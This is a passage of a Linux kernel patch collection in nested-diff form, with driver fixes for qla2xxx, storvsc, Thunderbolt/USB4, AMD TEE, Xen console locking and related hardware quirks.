++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	return sp;
+ }
+ 
+@@ -3112,7 +3114,6 @@ qla25xx_process_bidir_status_iocb(scsi_qla_host_t *vha, void *pkt,
+ 	}
+ 	bsg_reply->reply_payload_rcv_len = 0;
+ 
+-	qla_put_fw_resources(sp->qpair, &sp->iores);
+ done:
+ 	/* Return the vendor specific reply to API */
+ 	bsg_reply->reply_data.vendor_reply.vendor_rsp[0] = rval;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 2d86f804872bf..02913cc75195b 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -360,6 +360,13 @@ MODULE_PARM_DESC(ql2xnvme_queues,
+ 	"1 - Minimum number of queues supported\n"
+ 	"8 - Default value");
+ 
++int ql2xfc2target = 1;
++module_param(ql2xfc2target, int, 0444);
++MODULE_PARM_DESC(qla2xfc2target,
++		  "Enables FC2 Target support. "
++		  "0 - FC2 Target support is disabled. "
++		  "1 - FC2 Target support is enabled (default).");
++
+ static struct scsi_transport_template *qla2xxx_transport_template = NULL;
+ struct scsi_transport_template *qla2xxx_transport_vport_template = NULL;
+ 
+@@ -1848,6 +1855,17 @@ __qla2x00_abort_all_cmds(struct qla_qpair *qp, int res)
+ 	for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
+ 		sp = req->outstanding_cmds[cnt];
+ 		if (sp) {
++			/*
++			 * perform lockless completion during driver unload
++			 */
++			if (qla2x00_chip_is_down(vha)) {
++				req->outstanding_cmds[cnt] = NULL;
++				spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
++				sp->done(sp, res);
++				spin_lock_irqsave(qp->qp_lock_ptr, flags);
++				continue;
++			}
++
+ 			switch (sp->cmd_type) {
+ 			case TYPE_SRB:
+ 				qla2x00_abort_srb(qp, sp, res, &flags);
+@@ -4075,7 +4093,8 @@ qla2x00_mark_all_devices_lost(scsi_qla_host_t *vha)
+ 	    "Mark all dev lost\n");
+ 
+ 	list_for_each_entry(fcport, &vha->vp_fcports, list) {
+-		if (fcport->loop_id != FC_NO_LOOP_ID &&
++		if (ql2xfc2target &&
++		    fcport->loop_id != FC_NO_LOOP_ID &&
+ 		    (fcport->flags & FCF_FCP2_DEVICE) &&
+ 		    fcport->port_type == FCT_TARGET &&
+ 		    !qla2x00_reset_active(vha)) {
+diff --git a/drivers/scsi/scsi_devinfo.c b/drivers/scsi/scsi_devinfo.c
+index bc9d280417f6a..3fcaf10a9dfe7 100644
+--- a/drivers/scsi/scsi_devinfo.c
++++ b/drivers/scsi/scsi_devinfo.c
+@@ -234,6 +234,7 @@ static struct {
+ 	{"SGI", "RAID5", "*", BLIST_SPARSELUN},
+ 	{"SGI", "TP9100", "*", BLIST_REPORTLUN2},
+ 	{"SGI", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
++	{"SKhynix", "H28U74301AMR", NULL, BLIST_SKIP_VPD_PAGES},
+ 	{"IBM", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+ 	{"SUN", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+ 	{"DELL", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 22705eb781b0e..2bf25e80b29a8 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -987,6 +987,22 @@ static void storvsc_handle_error(struct vmscsi_request *vm_srb,
+ 				goto do_work;
+ 			}
+ 
++			/*
++			 * Check for "Operating parameters have changed"
++			 * due to Hyper-V changing the VHD/VHDX BlockSize
++			 * when adding/removing a differencing disk. This
++			 * causes discard_granularity to change, so do a
++			 * rescan to pick up the new granularity. We don't
++			 * want scsi_report_sense() to output a message
++			 * that a sysadmin wouldn't know what to do with.
++			 */
++			if ((asc == 0x3f) && (ascq != 0x03) &&
++					(ascq != 0x0e)) {
++				process_err_fn = storvsc_device_scan;
++				set_host_byte(scmnd, DID_REQUEUE);
++				goto do_work;
++			}
++
+ 			/*
+ 			 * Otherwise, let upper layer deal with the
+ 			 * error when sense message is present
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 23ce2f78c4ed4..26efe12012a0d 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -191,9 +191,9 @@ static const struct llcc_slice_config sc8280xp_data[] = {
+ 	{ LLCC_CVP,      28, 512,  3, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+ 	{ LLCC_APTCM,    30, 1024, 3, 1, 0x0,   0x1, 1, 0, 0, 1, 0, 0 },
+ 	{ LLCC_WRCACHE,  31, 1024, 1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
+-	{ LLCC_CVPFW,    32, 512,  1, 0, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+-	{ LLCC_CPUSS1,   33, 2048, 1, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+-	{ LLCC_CPUHWT,   36, 512,  1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
++	{ LLCC_CVPFW,    17, 512,  1, 0, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
++	{ LLCC_CPUSS1,   3, 2048, 1, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
++	{ LLCC_CPUHWT,   5, 512,  1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
+ };
+ 
+ static const struct llcc_slice_config sdm845_data[] =  {
+diff --git a/drivers/target/iscsi/iscsi_target_parameters.c b/drivers/target/iscsi/iscsi_target_parameters.c
+index 2317fb077db0e..557516c642c3b 100644
+--- a/drivers/target/iscsi/iscsi_target_parameters.c
++++ b/drivers/target/iscsi/iscsi_target_parameters.c
+@@ -1262,18 +1262,20 @@ static struct iscsi_param *iscsi_check_key(
+ 		return param;
+ 
+ 	if (!(param->phase & phase)) {
+-		pr_err("Key \"%s\" may not be negotiated during ",
+-				param->name);
++		char *phase_name;
++
+ 		switch (phase) {
+ 		case PHASE_SECURITY:
+-			pr_debug("Security phase.\n");
++			phase_name = "Security";
+ 			break;
+ 		case PHASE_OPERATIONAL:
+-			pr_debug("Operational phase.\n");
++			phase_name = "Operational";
+ 			break;
+ 		default:
+-			pr_debug("Unknown phase.\n");
++			phase_name = "Unknown";
+ 		}
++		pr_err("Key \"%s\" may not be negotiated during %s phase.\n",
++				param->name, phase_name);
+ 		return NULL;
+ 	}
+ 
+diff --git a/drivers/tee/amdtee/core.c b/drivers/tee/amdtee/core.c
+index 297dc62bca298..372d64756ed64 100644
+--- a/drivers/tee/amdtee/core.c
++++ b/drivers/tee/amdtee/core.c
+@@ -267,35 +267,34 @@ int amdtee_open_session(struct tee_context *ctx,
+ 		goto out;
+ 	}
+ 
++	/* Open session with loaded TA */
++	handle_open_session(arg, &session_info, param);
++	if (arg->ret != TEEC_SUCCESS) {
++		pr_err("open_session failed %d\n", arg->ret);
++		handle_unload_ta(ta_handle);
++		kref_put(&sess->refcount, destroy_session);
++		goto out;
++	}
++
+ 	/* Find an empty session index for the given TA */
+ 	spin_lock(&sess->lock);
+ 	i = find_first_zero_bit(sess->sess_mask, TEE_NUM_SESSIONS);
+-	if (i < TEE_NUM_SESSIONS)
++	if (i < TEE_NUM_SESSIONS) {
++		sess->session_info[i] = session_info;
++		set_session_id(ta_handle, i, &arg->session);
+ 		set_bit(i, sess->sess_mask);
++	}
+ 	spin_unlock(&sess->lock);
+ 
+ 	if (i >= TEE_NUM_SESSIONS) {
+ 		pr_err("reached maximum session count %d\n", TEE_NUM_SESSIONS);
++		handle_close_session(ta_handle, session_info);
+ 		handle_unload_ta(ta_handle);
+ 		kref_put(&sess->refcount, destroy_session);
+ 		rc = -ENOMEM;
+ 		goto out;
+ 	}
+ 
+-	/* Open session with loaded TA */
+-	handle_open_session(arg, &session_info, param);
+-	if (arg->ret != TEEC_SUCCESS) {
+-		pr_err("open_session failed %d\n", arg->ret);
+-		spin_lock(&sess->lock);
+-		clear_bit(i, sess->sess_mask);
+-		spin_unlock(&sess->lock);
+-		handle_unload_ta(ta_handle);
+-		kref_put(&sess->refcount, destroy_session);
+-		goto out;
+-	}
+-
+-	sess->session_info[i] = session_info;
+-	set_session_id(ta_handle, i, &arg->session);
+ out:
+ 	free_pages((u64)ta, get_order(ta_size));
+ 	return rc;
+diff --git a/drivers/thunderbolt/debugfs.c b/drivers/thunderbolt/debugfs.c
+index 834bcad42e9fe..d89f92032c1c2 100644
+--- a/drivers/thunderbolt/debugfs.c
++++ b/drivers/thunderbolt/debugfs.c
+@@ -942,7 +942,8 @@ static void margining_port_remove(struct tb_port *port)
+ 
+ 	snprintf(dir_name, sizeof(dir_name), "port%d", port->port);
+ 	parent = debugfs_lookup(dir_name, port->sw->debugfs_dir);
+-	debugfs_remove_recursive(debugfs_lookup("margining", parent));
++	if (parent)
++		debugfs_remove_recursive(debugfs_lookup("margining", parent));
+ 
+ 	kfree(port->usb4->margining);
+ 	port->usb4->margining = NULL;
+@@ -967,19 +968,18 @@ static void margining_switch_init(struct tb_switch *sw)
+ 
+ static void margining_switch_remove(struct tb_switch *sw)
+ {
++	struct tb_port *upstream, *downstream;
+ 	struct tb_switch *parent_sw;
+-	struct tb_port *downstream;
+ 	u64 route = tb_route(sw);
+ 
+ 	if (!route)
+ 		return;
+ 
+-	/*
+-	 * Upstream is removed with the router itself but we need to
+-	 * remove the downstream port margining directory.
+-	 */
++	upstream = tb_upstream_port(sw);
+ 	parent_sw = tb_switch_parent(sw);
+ 	downstream = tb_port_at(route, parent_sw);
++
++	margining_port_remove(upstream);
+ 	margining_port_remove(downstream);
+ }
+ 
+diff --git a/drivers/thunderbolt/nhi.c b/drivers/thunderbolt/nhi.c
+index 4dce2edd86ea0..cfebec107f3fc 100644
+--- a/drivers/thunderbolt/nhi.c
++++ b/drivers/thunderbolt/nhi.c
+@@ -46,7 +46,7 @@
+ #define QUIRK_AUTO_CLEAR_INT	BIT(0)
+ #define QUIRK_E2E		BIT(1)
+ 
+-static int ring_interrupt_index(struct tb_ring *ring)
++static int ring_interrupt_index(const struct tb_ring *ring)
+ {
+ 	int bit = ring->hop;
+ 	if (!ring->is_tx)
+@@ -63,13 +63,14 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ {
+ 	int reg = REG_RING_INTERRUPT_BASE +
+ 		  ring_interrupt_index(ring) / 32 * 4;
+-	int bit = ring_interrupt_index(ring) & 31;
+-	int mask = 1 << bit;
++	int interrupt_bit = ring_interrupt_index(ring) & 31;
++	int mask = 1 << interrupt_bit;
+ 	u32 old, new;
+ 
+ 	if (ring->irq > 0) {
+ 		u32 step, shift, ivr, misc;
+ 		void __iomem *ivr_base;
++		int auto_clear_bit;
+ 		int index;
+ 
+ 		if (ring->is_tx)
+@@ -77,18 +78,25 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ 		else
+ 			index = ring->hop + ring->nhi->hop_count;
+ 
+-		if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT) {
+-			/*
+-			 * Ask the hardware to clear interrupt status
+-			 * bits automatically since we already know
+-			 * which interrupt was triggered.
+-			 */
+-			misc = ioread32(ring->nhi->iobase + REG_DMA_MISC);
+-			if (!(misc & REG_DMA_MISC_INT_AUTO_CLEAR)) {
+-				misc |= REG_DMA_MISC_INT_AUTO_CLEAR;
+-				iowrite32(misc, ring->nhi->iobase + REG_DMA_MISC);
+-			}
+-		}
++		/*
++		 * Intel routers support a bit that isn't part of
++		 * the USB4 spec to ask the hardware to clear
++		 * interrupt status bits automatically since
++		 * we already know which interrupt was triggered.
++		 *
++		 * Other routers explicitly disable auto-clear
++		 * to prevent conditions that may occur where two
++		 * MSIX interrupts are simultaneously active and
++		 * reading the register clears both of them.
++		 */
++		misc = ioread32(ring->nhi->iobase + REG_DMA_MISC);
++		if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT)
++			auto_clear_bit = REG_DMA_MISC_INT_AUTO_CLEAR;
++		else
++			auto_clear_bit = REG_DMA_MISC_DISABLE_AUTO_CLEAR;
++		if (!(misc & auto_clear_bit))
++			iowrite32(misc | auto_clear_bit,
++				  ring->nhi->iobase + REG_DMA_MISC);
+ 
+ 		ivr_base = ring->nhi->iobase + REG_INT_VEC_ALLOC_BASE;
+ 		step = index / REG_INT_VEC_ALLOC_REGS * REG_INT_VEC_ALLOC_BITS;
+@@ -108,7 +116,7 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ 
+ 	dev_dbg(&ring->nhi->pdev->dev,
+ 		"%s interrupt at register %#x bit %d (%#x -> %#x)\n",
+-		active ? "enabling" : "disabling", reg, bit, old, new);
++		active ? "enabling" : "disabling", reg, interrupt_bit, old, new);
+ 
+ 	if (new == old)
+ 		dev_WARN(&ring->nhi->pdev->dev,
+@@ -393,14 +401,17 @@ EXPORT_SYMBOL_GPL(tb_ring_poll_complete);
+ 
+ static void ring_clear_msix(const struct tb_ring *ring)
+ {
++	int bit;
++
+ 	if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT)
+ 		return;
+ 
++	bit = ring_interrupt_index(ring) & 31;
+ 	if (ring->is_tx)
+-		ioread32(ring->nhi->iobase + REG_RING_NOTIFY_BASE);
++		iowrite32(BIT(bit), ring->nhi->iobase + REG_RING_INT_CLEAR);
+ 	else
+-		ioread32(ring->nhi->iobase + REG_RING_NOTIFY_BASE +
+-			 4 * (ring->nhi->hop_count / 32));
++		iowrite32(BIT(bit), ring->nhi->iobase + REG_RING_INT_CLEAR +
++			  4 * (ring->nhi->hop_count / 32));
+ }
+ 
+ static irqreturn_t ring_msix(int irq, void *data)
+diff --git a/drivers/thunderbolt/nhi_regs.h b/drivers/thunderbolt/nhi_regs.h
+index 0d4970dcef842..faef165a919cc 100644
+--- a/drivers/thunderbolt/nhi_regs.h
++++ b/drivers/thunderbolt/nhi_regs.h
+@@ -77,12 +77,13 @@ struct ring_desc {
+ 
+ /*
+  * three bitfields: tx, rx, rx overflow
+- * Every bitfield contains one bit for every hop (REG_HOP_COUNT). Registers are
+- * cleared on read. New interrupts are fired only after ALL registers have been
++ * Every bitfield contains one bit for every hop (REG_HOP_COUNT).
++ * New interrupts are fired only after ALL registers have been
+  * read (even those containing only disabled rings).
+  */
+ #define REG_RING_NOTIFY_BASE	0x37800
+ #define RING_NOTIFY_REG_COUNT(nhi) ((31 + 3 * nhi->hop_count) / 32)
++#define REG_RING_INT_CLEAR	0x37808
+ 
+ /*
+  * two bitfields: rx, tx
+@@ -105,6 +106,7 @@ struct ring_desc {
+ 
+ #define REG_DMA_MISC			0x39864
+ #define REG_DMA_MISC_INT_AUTO_CLEAR     BIT(2)
++#define REG_DMA_MISC_DISABLE_AUTO_CLEAR	BIT(17)
+ 
+ #define REG_INMAIL_DATA			0x39900
+ 
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index b5f2ec79c4d6e..ae28a03fa890b 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -20,6 +20,12 @@ static void quirk_dp_credit_allocation(struct tb_switch *sw)
+ 	}
+ }
+ 
++static void quirk_clx_disable(struct tb_switch *sw)
++{
++	sw->quirks |= QUIRK_NO_CLX;
++	tb_sw_dbg(sw, "disabling CL states\n");
++}
++
+ struct tb_quirk {
+ 	u16 hw_vendor_id;
+ 	u16 hw_device_id;
+@@ -37,6 +43,13 @@ static const struct tb_quirk tb_quirks[] = {
+ 	 * DP buffers.
+ 	 */
+ 	{ 0x8087, 0x0b26, 0x0000, 0x0000, quirk_dp_credit_allocation },
++	/*
++	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
++	 */
++	{ 0x0438, 0x0208, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x0209, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x020a, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x020b, 0x0000, 0x0000, quirk_clx_disable },
+ };
+ 
+ /**
+diff --git a/drivers/thunderbolt/retimer.c b/drivers/thunderbolt/retimer.c
+index 56008eb91e2e4..9cc28197dbc45 100644
+--- a/drivers/thunderbolt/retimer.c
++++ b/drivers/thunderbolt/retimer.c
+@@ -187,6 +187,22 @@ static ssize_t nvm_authenticate_show(struct device *dev,
+ 	return ret;
+ }
+ 
++static void tb_retimer_set_inbound_sbtx(struct tb_port *port)
++{
++	int i;
++
++	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
++		usb4_port_retimer_set_inbound_sbtx(port, i);
++}
++
++static void tb_retimer_unset_inbound_sbtx(struct tb_port *port)
++{
++	int i;
++
++	for (i = TB_MAX_RETIMER_INDEX; i >= 1; i--)
++		usb4_port_retimer_unset_inbound_sbtx(port, i);
++}
++
+ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	struct device_attribute *attr, const char *buf, size_t count)
+ {
+@@ -213,6 +229,7 @@ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	rt->auth_status = 0;
+ 
+ 	if (val) {
++		tb_retimer_set_inbound_sbtx(rt->port);
+ 		if (val == AUTHENTICATE_ONLY) {
+ 			ret = tb_retimer_nvm_authenticate(rt, true);
+ 		} else {
+@@ -232,6 +249,7 @@ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	}
+ 
+ exit_unlock:
++	tb_retimer_unset_inbound_sbtx(rt->port);
+ 	mutex_unlock(&rt->tb->lock);
+ exit_rpm:
+ 	pm_runtime_mark_last_busy(&rt->dev);
+@@ -440,8 +458,7 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 	 * Enable sideband channel for each retimer. We can do this
+ 	 * regardless whether there is device connected or not.
+ 	 */
+-	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
+-		usb4_port_retimer_set_inbound_sbtx(port, i);
++	tb_retimer_set_inbound_sbtx(port);
+ 
+ 	/*
+ 	 * Before doing anything else, read the authentication status.
+@@ -464,6 +481,8 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 			break;
+ 	}
+ 
++	tb_retimer_unset_inbound_sbtx(port);
++
+ 	if (!last_idx)
+ 		return 0;
+ 
+diff --git a/drivers/thunderbolt/sb_regs.h b/drivers/thunderbolt/sb_regs.h
+index 5185cf3e4d978..f37a4320f10a5 100644
+--- a/drivers/thunderbolt/sb_regs.h
++++ b/drivers/thunderbolt/sb_regs.h
+@@ -20,6 +20,7 @@ enum usb4_sb_opcode {
+ 	USB4_SB_OPCODE_ROUTER_OFFLINE = 0x4e45534c,		/* "LSEN" */
+ 	USB4_SB_OPCODE_ENUMERATE_RETIMERS = 0x4d554e45,		/* "ENUM" */
+ 	USB4_SB_OPCODE_SET_INBOUND_SBTX = 0x5055534c,		/* "LSUP" */
++	USB4_SB_OPCODE_UNSET_INBOUND_SBTX = 0x50555355,		/* "USUP" */
+ 	USB4_SB_OPCODE_QUERY_LAST_RETIMER = 0x5453414c,		/* "LAST" */
+ 	USB4_SB_OPCODE_GET_NVM_SECTOR_SIZE = 0x53534e47,	/* "GNSS" */
+ 	USB4_SB_OPCODE_NVM_SET_OFFSET = 0x53504f42,		/* "BOPS" */
+diff --git a/drivers/thunderbolt/switch.c b/drivers/thunderbolt/switch.c
+index 363d712aa3643..302a73cb03baf 100644
+--- a/drivers/thunderbolt/switch.c
++++ b/drivers/thunderbolt/switch.c
+@@ -2960,8 +2960,6 @@ int tb_switch_add(struct tb_switch *sw)
+ 			dev_warn(&sw->dev, "reading DROM failed: %d\n", ret);
+ 		tb_sw_dbg(sw, "uid: %#llx\n", sw->uid);
+ 
+-		tb_check_quirks(sw);
+-
+ 		ret = tb_switch_set_uuid(sw);
+ 		if (ret) {
+ 			dev_err(&sw->dev, "failed to set UUID\n");
+@@ -2980,6 +2978,8 @@ int tb_switch_add(struct tb_switch *sw)
+ 			}
+ 		}
+ 
++		tb_check_quirks(sw);
++
+ 		tb_switch_default_link_ports(sw);
+ 
+ 		ret = tb_switch_update_link_attributes(sw);
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index f9786976f5ecf..e11d973a8f9b6 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -23,6 +23,11 @@
+ #define NVM_MAX_SIZE		SZ_512K
+ #define NVM_DATA_DWORDS		16
+ 
++/* Keep link controller awake during update */
++#define QUIRK_FORCE_POWER_LINK_CONTROLLER		BIT(0)
++/* Disable CLx if not supported */
++#define QUIRK_NO_CLX					BIT(1)
++
+ /**
+  * struct tb_nvm - Structure holding NVM information
+  * @dev: Owner of the NVM
+@@ -997,6 +1002,9 @@ static inline bool tb_switch_is_clx_enabled(const struct tb_switch *sw,
+  */
+ static inline bool tb_switch_is_clx_supported(const struct tb_switch *sw)
+ {
++	if (sw->quirks & QUIRK_NO_CLX)
++		return false;
++
+ 	return tb_switch_is_usb4(sw) || tb_switch_is_titan_ridge(sw);
+ }
+ 
+@@ -1212,6 +1220,7 @@ int usb4_port_sw_margin(struct tb_port *port, unsigned int lanes, bool timing,
+ int usb4_port_sw_margin_errors(struct tb_port *port, u32 *errors);
+ 
+ int usb4_port_retimer_set_inbound_sbtx(struct tb_port *port, u8 index);
++int usb4_port_retimer_unset_inbound_sbtx(struct tb_port *port, u8 index);
+ int usb4_port_retimer_read(struct tb_port *port, u8 index, u8 reg, void *buf,
+ 			   u8 size);
+ int usb4_port_retimer_write(struct tb_port *port, u8 index, u8 reg,
+@@ -1254,9 +1263,6 @@ struct usb4_port *usb4_port_device_add(struct tb_port *port);
+ void usb4_port_device_remove(struct usb4_port *usb4);
+ int usb4_port_device_resume(struct usb4_port *usb4);
+ 
+-/* Keep link controller awake during update */
+-#define QUIRK_FORCE_POWER_LINK_CONTROLLER		BIT(0)
+-
+ void tb_check_quirks(struct tb_switch *sw);
+ 
+ #ifdef CONFIG_ACPI
+diff --git a/drivers/thunderbolt/usb4.c b/drivers/thunderbolt/usb4.c
+index 2ed50fcbcca7a..d5cd219ee9e6b 100644
+--- a/drivers/thunderbolt/usb4.c
++++ b/drivers/thunderbolt/usb4.c
+@@ -1578,6 +1578,20 @@ int usb4_port_retimer_set_inbound_sbtx(struct tb_port *port, u8 index)
+ 				    500);
+ }
+ 
++/**
++ * usb4_port_retimer_unset_inbound_sbtx() - Disable sideband channel transactions
++ * @port: USB4 port
++ * @index: Retimer index
++ *
++ * Disables sideband channel transations on SBTX. The reverse of
++ * usb4_port_retimer_set_inbound_sbtx().
++ */
++int usb4_port_retimer_unset_inbound_sbtx(struct tb_port *port, u8 index)
++{
++	return usb4_port_retimer_op(port, index,
++				    USB4_SB_OPCODE_UNSET_INBOUND_SBTX, 500);
++}
++
+ /**
+  * usb4_port_retimer_read() - Read from retimer sideband registers
+  * @port: USB4 port
+@@ -2067,18 +2081,30 @@ static int usb4_usb3_port_write_allocated_bandwidth(struct tb_port *port,
+ 						    int downstream_bw)
+ {
+ 	u32 val, ubw, dbw, scale;
+-	int ret;
++	int ret, max_bw;
+ 
+-	/* Read the used scale, hardware default is 0 */
+-	ret = tb_port_read(port, &scale, TB_CFG_PORT,
+-			   port->cap_adap + ADP_USB3_CS_3, 1);
++	/* Figure out suitable scale */
++	scale = 0;
++	max_bw = max(upstream_bw, downstream_bw);
++	while (scale < 64) {
++		if (mbps_to_usb3_bw(max_bw, scale) < 4096)
++			break;
++		scale++;
++	}
++
++	if (WARN_ON(scale >= 64))
++		return -EINVAL;
++
++	ret = tb_port_write(port, &scale, TB_CFG_PORT,
++			    port->cap_adap + ADP_USB3_CS_3, 1);
+ 	if (ret)
+ 		return ret;
+ 
+-	scale &= ADP_USB3_CS_3_SCALE_MASK;
+ 	ubw = mbps_to_usb3_bw(upstream_bw, scale);
+ 	dbw = mbps_to_usb3_bw(downstream_bw, scale);
+ 
++	tb_port_dbg(port, "scaled bandwidth %u/%u, scale %u\n", ubw, dbw, scale);
++
+ 	ret = tb_port_read(port, &val, TB_CFG_PORT,
+ 			   port->cap_adap + ADP_USB3_CS_2, 1);
+ 	if (ret)
+diff --git a/drivers/tty/hvc/hvc_xen.c b/drivers/tty/hvc/hvc_xen.c
+index 5bddb2f5e9318..98764e740c078 100644
+--- a/drivers/tty/hvc/hvc_xen.c
++++ b/drivers/tty/hvc/hvc_xen.c
+@@ -43,6 +43,7 @@ struct xencons_info {
+ 	int irq;
+ 	int vtermno;
+ 	grant_ref_t gntref;
++	spinlock_t ring_lock;
+ };
+ 
+ static LIST_HEAD(xenconsoles);
+@@ -89,12 +90,15 @@ static int __write_console(struct xencons_info *xencons,
+ 	XENCONS_RING_IDX cons, prod;
+ 	struct xencons_interface *intf = xencons->intf;
+ 	int sent = 0;
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&xencons->ring_lock, flags);
+ 	cons = intf->out_cons;
+ 	prod = intf->out_prod;
+ 	mb();			/* update queue values before going on */
+ 
+ 	if ((prod - cons) > sizeof(intf->out)) {
++		spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 		pr_err_once("xencons: Illegal ring page indices");
+ 		return -EINVAL;
+ 	}
+@@ -104,6 +108,7 @@ static int __write_console(struct xencons_info *xencons,
+ 
+ 	wmb();			/* write ring before updating pointer */
+ 	intf->out_prod = prod;
++	spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 
+ 	if (sent)
+ 		notify_daemon(xencons);
+@@ -146,16 +151,19 @@ static int domU_read_console(uint32_t vtermno, char *buf, int len)
+ 	int recv = 0;
+ 	struct xencons_info *xencons = vtermno_to_xencons(vtermno);
+ 	unsigned int eoiflag = 0;
++	unsigned long flags;
+ 
+ 	if (xencons == NULL)
+ 		return -EINVAL;
+ 	intf = xencons->intf;
+ 
++	spin_lock_irqsave(&xencons->ring_lock, flags);
+ 	cons = intf->in_cons;
+ 	prod = intf->in_prod;
+ 	mb();			/* get pointers before reading ring */
+ 
+ 	if ((prod - cons) > sizeof(intf->in)) {
++		spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 		pr_err_once("xencons: Illegal ring page indices");
+ 		return -EINVAL;
+ 	}
+@@ -179,10 +187,13 @@ static int domU_read_console(uint32_t vtermno, char *buf, int len)
+ 		xencons->out_cons = intf->out_cons;
+ 		xencons->out_cons_same = 0;
+ 	}
++	if (!recv && xencons->out_cons_same++ > 1) {
++		eoiflag = XEN_EOI_FLAG_SPURIOUS;
++	}
++	spin_unlock_irqrestore(&xencons->ring_lock, flags);
++
+ 	if (recv) {
+ 		notify_daemon(xencons);
+-	} else if (xencons->out_cons_same++ > 1) {
+-		eoiflag = XEN_EOI_FLAG_SPURIOUS;
+ 	}
+ 
+ 	xen_irq_lateeoi(xencons->irq, eoiflag);
+@@ -239,6 +250,7 @@ static int xen_hvm_console_init(void)
+ 		info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 		if (!info)
+ 			return -ENOMEM;
++		spin_lock_init(&info->ring_lock);
+ 	} else if (info->intf != NULL) {
+ 		/* already configured */
+ 		return 0;
+@@ -275,6 +287,7 @@ err:
+ 
+ static int xencons_info_pv_init(struct xencons_info *info, int vtermno)
+ {
++	spin_lock_init(&info->ring_lock);
+ 	info->evtchn = xen_start_info->console.domU.evtchn;
+ 	/* GFN == MFN for PV guest */
+ 	info->intf = gfn_to_virt(xen_start_info->console.domU.mfn);
+@@ -325,6 +338,7 @@ static int xen_initial_domain_console_init(void)
+ 		info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 		if (!info)
+ 			return -ENOMEM;
++		spin_lock_init(&info->ring_lock);
+ 	}
+ 
+ 	info->irq = bind_virq_to_irq(VIRQ_CONSOLE, 0, false);
+@@ -482,6 +496,7 @@ static int xencons_probe(struct xenbus_device *dev,
+ 	info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 	if (!info)
+ 		return -ENOMEM;
++	spin_lock_init(&info->ring_lock);
+ 	dev_set_drvdata(&dev->dev, info);
+ 	info->xbdev = dev;
+ 	info->vtermno = xenbus_devid_to_vtermno(devid);
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 2ddc1aba0ad75..edb93d2c5a781 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -10095,4 +10095,5 @@ module_exit(ufshcd_core_exit);
+ MODULE_AUTHOR("Santosh Yaragnavi <santosh.sy@samsung.com>");
+ MODULE_AUTHOR("Vinayak Holikatti <h.vinayak@samsung.com>");
+ MODULE_DESCRIPTION("Generic UFS host controller driver Core");
++MODULE_SOFTDEP("pre: governor_simpleondemand");
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/usb/cdns3/cdns3-pci-wrap.c b/drivers/usb/cdns3/cdns3-pci-wrap.c
+index deeea618ba33b..1f6320d98a76b 100644
+--- a/drivers/usb/cdns3/cdns3-pci-wrap.c
++++ b/drivers/usb/cdns3/cdns3-pci-wrap.c
+@@ -60,6 +60,11 @@ static struct pci_dev *cdns3_get_second_fun(struct pci_dev *pdev)
+ 			return NULL;
+ 	}
+ 
++	if (func->devfn != PCI_DEV_FN_HOST_DEVICE &&
++	    func->devfn != PCI_DEV_FN_OTG) {
++		return NULL;
++	}
++
+ 	return func;
+ }
+ 
+diff --git a/drivers/usb/cdns3/cdnsp-ep0.c b/drivers/usb/cdns3/cdnsp-ep0.c
+index 9b8325f824992..d63d5d92f2554 100644
+--- a/drivers/usb/cdns3/cdnsp-ep0.c
